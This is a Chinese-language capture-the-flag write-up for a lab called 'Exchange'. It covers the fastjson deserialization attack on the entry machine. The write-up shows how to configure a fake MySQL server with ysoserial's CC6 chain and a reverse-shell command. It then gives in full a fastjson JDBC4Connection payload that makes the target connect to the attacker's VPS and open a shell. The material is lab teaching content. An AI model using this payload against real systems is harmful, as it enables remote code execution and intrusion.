春秋云境—Exchange 入口机fastjson WriteUp

编辑MySQL_Fake_Server目录下的config.json文件

javaBinPathjava路径

ysoserialPath:执行攻击的jar

yso:写入反弹shell的命令(下一步中user的值要与这里的CC6与保持一致)

修改完成后启动我们伪造的SQl服务
python3 server.py

开启监听

编写payload

{
 "name": {
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.jdbc.JDBC4Connection",
  "hostToConnectTo": "开启sql服务的VPS地址",
  "portToConnectTo": 3306,
  "info": {
   "user": "CC6",
   "password": "pas",
   "detectCustomCollations": "true",
   "autoDeserialize": "true",
   "NUM_HOSTS": "1"
  },
  "databaseToConnectTo": "dbname",
  "url": ""
 }

hostToConnectTo:开启服务的vps地址

userconfig.json文件中的CC6

payload进行ulr编码(一定要完全转换成ulr)

像这样是不行的

向靶机发送payload

Vps伪装的sql服务器收到请求,并返回恶意SQL结果触发反序列化

成功反弹shell

拿到flag

  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值